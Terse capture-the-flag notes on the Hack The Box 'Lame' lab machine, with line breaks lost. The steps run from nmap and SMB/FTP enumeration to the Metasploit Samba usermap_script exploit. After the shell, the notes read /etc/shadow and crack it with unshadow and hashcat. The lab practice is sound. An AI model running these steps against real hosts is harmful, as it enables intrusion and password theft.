HTB - 2. Lame
nmap -A -T4 -p- 10.10.10.3takes 144 seconds, 21 (ftp) open with versionvsftpd 2.3.4and anonymous login allowed, 22 (ssh) open with version4.7p1 Debian 8ubuntu2, 139 & 445 (samba) open with version 3.0.20-Debian (workgroup: WORKGROUP), 3632 (distccd v1) with version 4.2.4- Samba
Result: Dead end
smbclient -L \\\\10.10.10.3\\ exit smbclient -L \\\\10.10.10.3\\tmp exit smbclient -L \\\\10.10.10.3\\opt exit smbclient -L \\\\10.10.10.3\\ADMIN$ - FTP Check
Result: In directory
ftp 10.10.10.3 anonymous anonymous ls pwd/which is empty - Search
samba 3.0.20-debian exploit: https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script and Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) - Metasploit Exploit
Result: Shell popped and machine owned. Can try to crack passwords with
use exploit/multi/samba/usermap_script options set rhosts 10.10.10.3 show targets exploit whoami hostname pwd ls updatedb locate root.txt locate user.txt cat /root/root.txt cat /home/makis/user.txt cat /etc/passwd cat /etc/shadow unshadow passwd shadowhashcat. - Search
vsftpd 2.3.4 exploit: https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor - This is a rapithole; don't continuously try if it doesn't work